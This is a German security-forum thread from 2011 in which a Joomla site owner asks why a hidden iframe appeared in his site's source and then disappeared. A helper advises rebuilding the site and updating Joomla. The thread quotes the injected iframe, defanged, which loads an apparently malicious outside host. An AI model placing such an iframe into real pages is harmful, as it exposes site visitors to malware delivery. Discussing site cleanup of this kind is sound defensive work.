Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Website-Infizierung/-Hack -> Einfügen eines iframes...

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 17.05.2011, 13:16   #1
RMZ
 
Website-Infizierung/-Hack -> Einfügen eines iframes... - Frage

Website-Infizierung/-Hack -> Einfügen eines iframes...



Hallo zusammen,

gestern habe ich bemerkt, dass meine Website www.Family-of-Horror.de gehackt wurde. Im Quellcode - gleich zu Beginn - hat sich ein iframe eingenistet:

<iframe src="hxxp://gratwall.vv.cc/showthread.php?t=80480463" width="1"...usw.>

Ich verwende Joomla, und wenn ich den "Bild einfügen" Button klicke, dann meldet sich mein Antivir-Programm bezüglich eines Angriffes (siehe angehängte Datei).

Auf meine Anfrage hin teilte mir mein Hoster mit, dass ein Hackerangriff erfolgte und ich doch ein Backup draufspielen solle.

Das wollte ich heute früh auch machen, doch dabei habe ich festgestellt, dass das iframe wie von Geisterhand wieder entfernt wurde. Das Einfügen eines Bild funktioniert auch wieder, Anti-vir bringt keine Viren-Meldung.

Ich dachte mein Hoster hat vielleicht meine Website bereinigt. Ich habe bei diesem nachgehakt, doch dieser teilte mir mit, dass er mit dem verschwinden nichts zu tun hat.

Meine Fragen nun an euch:
1. Hat jemand eine Erklärung hierfür?
2. Was soll ich jetzt tun, es so belassen oder...?

Vielen Dank und Grüße
RMZ
Miniaturansicht angehängter Grafiken
-antivir.jpg  

Alt 17.05.2011, 15:15   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Website-Infizierung/-Hack -> Einfügen eines iframes... - Standard

Website-Infizierung/-Hack -> Einfügen eines iframes...



Ich würde die Seite sofort neu aufsetzen und mal überprüfen, ob Joomla aktuell war und auch sonstige Sicherheitsvorkherungen getroffen wurden.
__________________

__________________

Alt 17.05.2011, 15:32   #3
RMZ
 
Website-Infizierung/-Hack -> Einfügen eines iframes... - Standard

Website-Infizierung/-Hack -> Einfügen eines iframes...



Neuaufsetzen habe ich vor.

Aber wieso kommt und verschwindet der Virus urplötzlich? Das gibt es doch eigentlich gar nicht!?

Hat eventuell der Hoster eine Lücke auf seinem Server, diese nun geschlossen und bereinigt (was das urplötzliche verschwinden erklären würde) und will nun nichts davon wissen?
__________________

Alt 17.05.2011, 15:33   #4
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Website-Infizierung/-Hack -> Einfügen eines iframes... - Standard

Website-Infizierung/-Hack -> Einfügen eines iframes...



Kann ich dir nicht sagen meine strekt nämlich
__________________
"Die Wahrheit ist normalerweise nur eine Entschuldigung für einen Mangel an Fantasie." (Elim Garak)

Das Trojaner-Board unterstützen
Warum Linux besser als Windows ist!

Antwort

Themen zu Website-Infizierung/-Hack -> Einfügen eines iframes...
anfrage, backup, bezüglich, bild, button, datei, einfügen, entfernt, erklärung, festgestellt, frage, fragen, funktioniert, gehackt, hackerangriff, hallo zusammen, heute, klicke, melde, meldet, nichts, quellcode, verschwinden, website, zusammen



Ähnliche Themen: Website-Infizierung/-Hack -> Einfügen eines iframes...


  1. AVIRA meldet WORM/Kido.IH.54 nach Einfügen eines USB-Stick
    Plagegeister aller Art und deren Bekämpfung - 03.11.2014 (13)
  2. Merkwürdiger Post von FB: soll in Konsole Code einfügen
    Überwachung, Datenschutz und Spam - 28.09.2014 (10)
  3. Auf Website mit Meldung über Bundestrojaner geraten, Infizierung unsicher
    Plagegeister aller Art und deren Bekämpfung - 05.04.2014 (9)
  4. evtl. PC-Hack oder Online-Hack?
    Log-Analyse und Auswertung - 19.01.2014 (1)
  5. Hack über Website?
    Plagegeister aller Art und deren Bekämpfung - 06.11.2013 (5)
  6. Komische Iframes in Chrome
    Diskussionsforum - 09.10.2013 (1)
  7. Kopieren & Einfügen funktioniert nicht immer
    Plagegeister aller Art und deren Bekämpfung - 05.08.2013 (19)
  8. Wieder mal eine Auswertung eines OTLPE-Logs eines GVU/GEMA Trojaner infizierten Systems
    Log-Analyse und Auswertung - 29.06.2013 (10)
  9. JS/Iframe.BDS - sind Iframes hinter dem HTML-Bereich überhaupt gefährlich?
    Plagegeister aller Art und deren Bekämpfung - 25.01.2013 (5)
  10. Kann imageres.dll Nicht Einfügen
    Plagegeister aller Art und deren Bekämpfung - 26.10.2012 (1)
  11. JavaScript Hack auf Website - diretctrishta
    Plagegeister aller Art und deren Bekämpfung - 18.10.2010 (1)
  12. Kann nichts mehr kopieren/einfügen!!!!
    Alles rund um Windows - 20.03.2007 (2)
  13. Einfügen geht nicht mehr....
    Lob, Kritik und Wünsche - 04.01.2005 (4)
  14. einfügen von bewegten bildern??
    Alles rund um Windows - 04.10.2004 (2)
  15. Photoshop: Muster einfügen
    Alles rund um Windows - 27.06.2003 (2)

Zum Thema Website-Infizierung/-Hack -> Einfügen eines iframes... - Hallo zusammen, gestern habe ich bemerkt, dass meine Website www.Family-of-Horror.de gehackt wurde. Im Quellcode - gleich zu Beginn - hat sich ein iframe eingenistet : <iframe src="hxxp://gratwall.vv.cc/showthread.php?t=80480463" width="1"...usw.> Ich verwende - Website-Infizierung/-Hack -> Einfügen eines iframes......
Archiv
Du betrachtest: Website-Infizierung/-Hack -> Einfügen eines iframes... auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.